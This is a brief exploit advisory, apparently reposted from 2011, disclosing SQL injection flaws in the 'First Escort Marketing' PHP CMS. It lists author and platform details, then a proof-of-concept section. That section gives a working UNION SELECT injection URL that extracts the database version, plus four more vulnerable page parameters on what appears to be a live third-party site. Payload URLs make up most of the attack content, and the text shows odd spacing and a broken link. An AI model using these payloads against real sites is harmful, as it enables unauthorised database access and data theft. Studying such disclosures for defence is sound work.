First Escort Marketing is a commercial Content Management System. Multiple files in First Escort Marketing have the SQL injection vulnerability, which may cause sensitive information leakage.
[+] Info:
~~~~~~~~~
First Escort Marketing CMS Multiple SQL Injection
# Platform: php
# Date: 18.04.2011
# Author: nonamemts
# Software Link: html "> http://www.first-escort-marketing.co.uk/agencies.html
# Price: £ 599
# Tested on: Windows 7
# Mail: nonamemt@gmail.com
# Homepage: http://nonamemt.us
[+] Poc:
~~~~~~~~~
Http://www.bkjia.com/escort_agency/banner.php? CategoryID =-2 + union + select + 1, version (), 3, 4, 5, 6, 7 -- +
Http://www.bkjia.com/escort_agency/escort-profile.php? Modelid = 13 [Blind-SQL]
Http://www.bkjia.com/escort_agency/write_review.php? Modelid = 13 [SQL]
Http://www.bkjia.com/escort_agency/booking-form.php? Modelid = 13 [SQL]
Http://www.bkjia.com/escort_agency/gallery_escorts.php? Gallery_id = 13 [SQL]
Fixed: vulnerability filtering page